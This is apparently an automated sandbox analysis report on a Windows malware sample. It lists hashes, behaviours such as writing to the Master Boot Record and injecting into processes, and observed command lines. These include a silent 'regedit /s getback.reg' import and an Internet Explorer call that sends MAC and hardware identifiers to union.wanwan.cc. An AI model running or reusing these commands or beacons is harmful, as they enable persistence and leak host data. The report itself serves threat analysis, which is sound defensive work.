Analysis
-
max time kernel
0s -
max time network
33s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
31/10/2024, 14:49
Static task
static1
Behavioral task
behavioral1
Sample
835759aebbd9d2ac10b6e7ae25b7e8d3_JaffaCakes118.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
835759aebbd9d2ac10b6e7ae25b7e8d3_JaffaCakes118.exe
Resource
win10v2004-20241007-en
General
-
Target
835759aebbd9d2ac10b6e7ae25b7e8d3_JaffaCakes118.exe
-
Size
60KB
-
MD5
835759aebbd9d2ac10b6e7ae25b7e8d3
-
SHA1
d47d1d378c9b20dc3ce2e5c202fa9f8478e06b98
-
SHA256
02cd7c84b903401c79912c13872510517779077cf3b4dfb683e2d01b3a48fae2
-
SHA512
3da4c02fe8d48336497ca4a0c1c8a29b9c081ac10cd6540948f2595268febb36de5fbd092a708a0173c624c24b1a129529786695ea462bca20e2cb53a47d3cf2
-
SSDEEP
768:TED6ScJar0b01CamqZHKyKMB4Rn2iYkHj1WBw/N5bMzPRd/UIKJyFd/k:QcJar0O5m6eD1Wu07UuFdc
Malware Config
Signatures
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 835759aebbd9d2ac10b6e7ae25b7e8d3_JaffaCakes118.exe -
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 835759aebbd9d2ac10b6e7ae25b7e8d3_JaffaCakes118.exe -
Runs .reg file with regedit 1 IoCs
pid Process 1588 regedit.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4488 835759aebbd9d2ac10b6e7ae25b7e8d3_JaffaCakes118.exe 4488 835759aebbd9d2ac10b6e7ae25b7e8d3_JaffaCakes118.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4488 835759aebbd9d2ac10b6e7ae25b7e8d3_JaffaCakes118.exe -
Suspicious use of WriteProcessMemory 5 IoCs
description pid Process procid_target PID 4488 wrote to memory of 752 4488 835759aebbd9d2ac10b6e7ae25b7e8d3_JaffaCakes118.exe 86 PID 4488 wrote to memory of 752 4488 835759aebbd9d2ac10b6e7ae25b7e8d3_JaffaCakes118.exe 86 PID 4488 wrote to memory of 752 4488 835759aebbd9d2ac10b6e7ae25b7e8d3_JaffaCakes118.exe 86 PID 4488 wrote to memory of 3300 4488 835759aebbd9d2ac10b6e7ae25b7e8d3_JaffaCakes118.exe 88 PID 4488 wrote to memory of 3300 4488 835759aebbd9d2ac10b6e7ae25b7e8d3_JaffaCakes118.exe 88
Processes
-
C:\Users\Admin\AppData\Local\Temp\835759aebbd9d2ac10b6e7ae25b7e8d3_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\835759aebbd9d2ac10b6e7ae25b7e8d3_JaffaCakes118.exe"1⤵
- Writes to the Master Boot Record (MBR)
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4488 -
C:\Windows\SysWOW64\cmd.execmd.exe /c regedit /s "C:\Users\Admin\AppData\Local\Temp\getback.reg"2⤵
- System Location Discovery: System Language Discovery
PID:752 -
C:\Windows\SysWOW64\regedit.exeregedit /s "C:\Users\Admin\AppData\Local\Temp\getback.reg"3⤵
- Runs .reg file with regedit
PID:1588
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://union.wanwan.cc/Stat.ashx?Mac=CA65FB447FB&Hard=232138804165&ClientType=Home&Process=88&UserID=0017&Authen=758-7272⤵PID:3300
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3300 CREDAT:17410 /prefetch:23⤵PID:1520
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5626e2d76f5c328d57a3eff6a7f94d129
SHA1210fd33fa005775b30a8fd40a065a2e788934216
SHA2565d9ae4b62924d6da9c35305bfd0d61c893767b7113f8b2f239da02057f8bee6e
SHA512629290bd5791a42327b3b70a68609c6b0b9114365be8579553e01e6cbc98996c0fab475b88c0dd80d34dcc325453401c6cce26fb70ed67a9cb08271a07fd85a1